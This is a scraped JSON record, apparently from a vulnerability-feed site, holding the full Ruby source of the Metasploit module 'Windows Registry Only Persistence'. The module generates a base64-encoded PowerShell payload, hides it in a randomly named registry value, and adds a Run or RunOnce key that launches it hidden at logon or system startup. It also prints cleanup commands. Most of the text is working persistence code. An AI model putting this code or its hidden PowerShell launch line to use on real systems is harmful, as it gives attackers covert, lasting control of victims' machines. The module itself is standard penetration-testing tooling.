{“lastseen”:”2025-10-27T20:00:30″,”description”:”This module will install a payload that is executed during boot. It will be executed either at user logon or system…”,”published”:”2025-10-27T18:58:29″,”modified”:”2025-10-27T18:58:29″,”type”:”metasploit”,”title”:”Windows Registry Only Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-PERSISTENCE-REGISTRY-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Powershell\\n include Msf::Post::Windows::Registry\\n include Msf::Post::File\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/windows\/local\/registry_persistence’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Windows Registry Only Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module will install a payload that is executed during boot.\\n It will be executed either at user logon or system startup via the registry\\n value in \\”CurrentVersion\\\\Run\\” or \\”RunOnce\\” (depending on privilege and selected method).\\n The payload will be installed completely in registry.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Donny Maasland \\u003cdonny.maasland[at]fox-it.com\\u003e’, # original module\\n ‘h00die’,\\n ],\\n ‘Platform’ =\\u003e [ ‘win’ ],\\n ‘SessionTypes’ =\\u003e [ ‘meterpreter’, ‘shell’ ],\\n ‘Targets’ =\\u003e [\\n [ ‘Automatic’, {} ]\\n ],\\n ‘References’ =\\u003e [\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],\\n [‘URL’, ‘https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/setupapi\/run-and-runonce-registry-keys’],\\n [‘URL’, ‘https:\/\/pentestlab.blog\/2019\/10\/01\/persistence-registry-run-keys\/’]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2015-07-01’,\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [EVENT_DEPENDENT, REPEATABLE_SESSION],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [CONFIG_CHANGES, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options([\\n OptEnum.new(‘STARTUP’,\\n [true, ‘Startup type for the persistent payload.’, ‘USER’, [‘USER’, ‘SYSTEM’]]),\\n OptString.new(‘BLOB_REG_KEY’,\\n [false, ‘The registry key to use for storing the payload blob. (Default: random)’ ]),\\n OptString.new(‘BLOB_REG_NAME’,\\n [false, ‘The name to use for storing the payload blob. (Default: random)’ ]),\\n OptString.new(‘RUN_NAME’,\\n [false, ‘The name to use for the \\\\’Run\\\\’ key. (Default: random)’ ]),\\n OptInt.new(‘SLEEP_TIME’,\\n [false, ‘Amount of time to sleep (in seconds) before executing payload. (Default: 0)’, 0]),\\n OptEnum.new(‘REG_KEY’, [true, ‘Registry Key To Install To’, ‘Run’, %w[Run RunOnce]]),\\n ])\\n end\\n\\n def generate_payload_blob\\n opts = {\\n wrap_double_quotes: true,\\n encode_final_payload: true\\n }\\n cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts).split(‘ ‘)[-1]\\n end\\n\\n def generate_cmd(root_path, blob_key_name, blob_key_reg)\\n \\”%COMSPEC% \/b \/c start \/b \/min powershell -nop -w hidden -c \\\\\\”sleep #{datastore[‘SLEEP_TIME’]}; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item ‘#{root_path}:#{blob_key_name}’).GetValue(‘#{blob_key_reg}’))))\\\\\\”\\”\\n end\\n\\n def generate_blob_reg\\n blob_reg_key = datastore[‘BLOB_REG_KEY’] || \\”Software\\\\\\\\#{Rex::Text.rand_text_alphanumeric(8)}\\”\\n blob_reg_name = datastore[‘BLOB_REG_NAME’] || Rex::Text.rand_text_alphanumeric(8)\\n return blob_reg_key, blob_reg_name\\n end\\n\\n def generate_cmd_reg\\n datastore[‘RUN_NAME’] || Rex::Text.rand_text_alphanumeric(8)\\n end\\n\\n def install_blob(root_path, blob, blob_reg_key, blob_reg_name)\\n blob_reg_key = \\”#{root_path}\\\\\\\\#{blob_reg_key}\\”\\n new_key = false\\n if !registry_enumkeys(blob_reg_key)\\n unless registry_createkey(blob_reg_key)\\n fail_with(Failure::Unknown, \\”Failed to create key #{blob_reg_key}\\”)\\n end\\n print_good(\\”Created registry key #{blob_reg_key}\\”)\\n new_key = true\\n end\\n\\n unless registry_setvaldata(blob_reg_key, blob_reg_name, blob, ‘REG_SZ’)\\n fail_with(Failure::Unknown, ‘Failed to open the registry key for writing’)\\n end\\n print_good(\\”Installed payload blob to #{blob_reg_key}\\\\\\\\#{blob_reg_name}\\”)\\n return new_key\\n end\\n\\n def regkey\\n datastore[‘REG_KEY’]\\n end\\n\\n def install_cmd(cmd, cmd_reg, root_path)\\n unless registry_setvaldata(\\”#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\”, cmd_reg, cmd, ‘REG_EXPAND_SZ’)\\n fail_with(Failure::Unknown, ‘Could not install run key’)\\n end\\n print_good(\\”Installed run key #{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\\\\\\\#{cmd_reg}\\”)\\n end\\n\\n def get_root_path\\n return ‘HKCU’ if datastore[‘STARTUP’] == ‘USER’\\n\\n ‘HKLM’\\n end\\n\\n def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)\\n @clean_up_rc \\u003c\\u003c \\”reg deleteval -k ‘#{root_path}\\\\\\\\#{blob_reg_key}’ -v ‘#{blob_reg_name}’\\\\n\\”\\n if new_key\\n @clean_up_rc \\u003c\\u003c \\”reg deletekey -k ‘#{root_path}\\\\\\\\#{blob_reg_key}’\\\\n\\”\\n end\\n @clean_up_rc \\u003c\\u003c \\”reg deleteval -k ‘#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}’ -v ‘#{cmd_reg}’\\\\n\\”\\n end\\n\\n def check\\n return Msf::Exploit::CheckCode::Safe(‘System does not have powershell’) unless registry_enumkeys(‘HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\’).include?(‘PowerShell’)\\n\\n vprint_good(‘Powershell detected on system’)\\n\\n # test write to see if we have access\\n root_path = get_root_path\\n rand = Rex::Text.rand_text_alphanumeric(15)\\n\\n vprint_status(\\”Checking registry write access to: #{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\\\\\\\#{rand}\\”)\\n return Msf::Exploit::CheckCode::Safe(\\”Unable to write to registry path #{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\”) if registry_createkey(\\”#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\#{rand}\\”).nil?\\n\\n registry_deletekey(\\”#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\\\\\\\#{rand}\\”)\\n\\n Msf::Exploit::CheckCode::Vulnerable(‘Registry writable’)\\n end\\n\\n def install_persistence\\n print_status(‘Generating payload blob..’)\\n blob = generate_payload_blob\\n print_good(\\”Generated payload, #{blob.length} bytes\\”)\\n\\n root_path = get_root_path\\n print_status(\\”Root path is #{root_path}\\”)\\n\\n blob_reg_key, blob_reg_name = generate_blob_reg\\n cmd = generate_cmd(root_path, blob_reg_key, blob_reg_name)\\n cmd_reg = generate_cmd_reg\\n\\n print_status(‘Installing payload blob..’)\\n new_key = install_blob(root_path, blob, blob_reg_key, blob_reg_name)\\n\\n print_status(‘Installing run key’)\\n install_cmd(cmd, cmd_reg, root_path)\\n\\n create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/persistence\/registry.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/persistence\/registry\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-27T20:00:30″,”description”:”This module will install a payload that is executed during boot. It will be executed either at user logon or system…”,”published”:”2025-10-27T18:58:29″,”modified”:”2025-10-27T18:58:29″,”type”:”metasploit”,”title”:”Windows Registry Only Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-PERSISTENCE-REGISTRY-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-23532","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n